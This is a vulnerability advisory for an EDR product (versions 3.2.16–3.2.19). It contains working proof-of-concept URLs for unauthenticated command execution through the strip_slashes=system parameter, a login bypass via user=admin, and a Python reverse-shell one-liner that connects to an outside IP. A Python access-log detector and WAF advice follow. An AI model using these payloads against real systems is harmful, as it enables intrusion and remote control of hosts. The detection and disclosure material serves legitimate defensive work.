Affected versions

EDR 3.2.16、3.2.17、3.2.19

Vulnerability PoC

Setting any of the parameters host/path/row/limit to a command (host=command, path=command, row=command or limit=command) is enough to execute that command:

https://*****/tool/log/c.php?strip_slashes=system&host=id
https://*****/tool/log/c.php?strip_slashes=system&path=id
https://*****/tool/log/c.php?strip_slashes=system&row=id
https://*****/tool/log/c.php?strip_slashes=system&limit=id
# Unauthorized login (authentication bypass)
https://ip:xx/ui/login.php?user=admin   # (the username must exist)
# Command execution
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
# Reverse shell
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.105',1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
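As an added defensive example (not part of the original write-up, and not vendor code), the following Python scans web-server access logs for the request patterns documented above: the strip_slashes=system callback parameter on /tool/log/c.php combined with one of the host/path/row/limit arguments, any other request that reaches that endpoint with strip_slashes set, and the unauthenticated user= parameter on /ui/login.php. The log lines are constructed samples in combined log format, and the severity labels are an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names taken from the PoC above
RCE_PATH = "/tool/log/c.php"
RCE_FUNC_PARAM = "strip_slashes"
RCE_ARG_PARAMS = ("host", "path", "row", "limit")
LOGIN_PATH = "/ui/login.php"

# Constructed sample access log (combined log format); not real traffic
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ui/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1" 200 77 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /ui/login.php?user=admin HTTP/1.1" 302 0 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /tool/log/c.php?strip_slashes=addslashes&host=x HTTP/1.1" 200 77 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /tool/log/c.php?strip_slashes=system&path=whoami HTTP/1.1" 200 77 "-" "curl/8.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
# In real logs the target is URL-encoded, so it contains no spaces; parse_qs decodes it.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict with path and decoded query for one log line, or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Map one parsed request to (severity, reason) or None if it matches nothing."""
    path, q = entry["path"], entry["query"]
    if path == RCE_PATH and RCE_FUNC_PARAM in q:
        func = q[RCE_FUNC_PARAM][0]
        args = {p: q[p][0] for p in RCE_ARG_PARAMS if p in q}
        if func == "system" and args:
            # Exactly the PoC shape: callback=system plus a command-bearing argument
            return "critical", f"command execution via {RCE_FUNC_PARAM}=system, args={args}"
        # Any other reach of the vulnerable endpoint with the callback parameter is worth review
        return "suspicious", f"vulnerable endpoint reached with {RCE_FUNC_PARAM}={func}"
    if path == LOGIN_PATH and "user" in q:
        # Login page called with a username in the query string, as in the bypass PoC
        return "high", f"login bypass attempt for user={q['user'][0]}"
    return None


def detect(log_text):
    """Scan an access log and return one finding per matching request, in log order."""
    findings = []
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is None:
            continue
        severity, reason = verdict
        findings.append({
            "ip": entry["ip"],
            "ts": entry["ts"],
            "severity": severity,
            "reason": reason,
            "target": entry["target"],
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['severity']:10} {f['ip']:12} {f['ts']}  {f['reason']}")
```

Run against the constructed sample, the detector reports two critical hits (host=id and path=whoami), one high hit for the login bypass, one suspicious hit for the non-system callback, and ignores the ordinary /ui/index.php request. In production, the same three checks translate directly into WAF or SIEM rules keyed on the path and the strip_slashes parameter; blocking external access to /tool/log/c.php outright is the simplest compensating control until the affected versions are patched.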

[Screenshots omitted: 1.jpg, 2.jpg, 3.jpg]